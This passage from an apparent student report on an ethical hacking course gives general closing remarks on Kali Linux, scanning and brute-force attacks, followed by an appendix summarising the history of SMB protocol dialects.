through in later attack attempts, which helped to clarify the underlying concepts.

This course was beneficial in learning various tools and strategies in Kali Linux that may
be utilized for ethical hacking. It improved the practical notion of scanning and exploiting
machine vulnerabilities. This report might be beneficial to students who wish to get
basic practical understanding about ethical hacking.

Brute force attacks are used to circumvent security measures and gain access to the
desired data. While it may appear that only criminals benefit from them, many security
organizations use brute force attacks to help evaluate their clients' systems.

Any time a system is subjected to an automated attack, whether online or offline, it
faces a serious risk, since it is only a matter of time before the attack succeeds.
Countermeasures can at the very least slow attackers down.



8) Appendix

Since the introduction of the SMB protocol, several SMB dialects have been produced,
each of which has improved on the original implementation by providing additional
features, scalability, security, and efficiency. Here's a rundown of the most significant
dialects:

• SMB 1.0 (1984): IBM developed SMB 1.0 for file sharing in DOS. It introduced
opportunistic locking (OpLock), a client-side caching mechanism aimed at
reducing network traffic. Microsoft later integrated the SMB protocol into its
LAN Manager software.
• CIFS (1996): CIFS is a Microsoft-created SMB dialect that first appeared in
Windows 95. CIFS, which stands for Common Internet File System, added support
for larger file sizes, direct transport over TCP/IP, and symbolic and hard
links.
• SMB 2.0 (2006): Windows Vista and Windows Server 2008 included SMB 2.0. It
improved performance by reducing chattiness, increasing scalability and
robustness, and adding support for wide area network (WAN) acceleration.
• SMB 2.1 (2010): SMB 2.1 was released alongside Windows Server 2008 R2 and
Windows 7. To improve caching and performance, the client OpLock leasing
model replaced OpLocks. Other improvements added support for larger
maximum transmission units and better energy efficiency, which allowed
clients with open files on an SMB server to enter sleep mode.
• SMB 3.0 (2012): SMB 3.0 was first introduced in Windows 8 and Windows
Server 2012. It included several substantial enhancements to increase
availability, performance, backup, security, and management. SMB Multichannel,
SMB Direct, transparent failover of client access, Remote Volume Shadow Copy
Service support, SMB Encryption, and other notable new features were added.
• SMB 3.02 (2014): Windows 8.1 and Windows Server 2012 R2 included SMB
3.02. It includes speed improvements and the ability to disable CIFS/SMB 1.0
support, as well as the removal of associated binaries.


• SMB 3.1.1 (2015): SMB 3.1.1 was made available alongside Windows 10 and
Windows Server 2016. Among other things, it included support for enhanced
encryption, pre-authentication integrity to avoid man-in-the-middle (MitM) attacks,
and cluster dialect fencing.
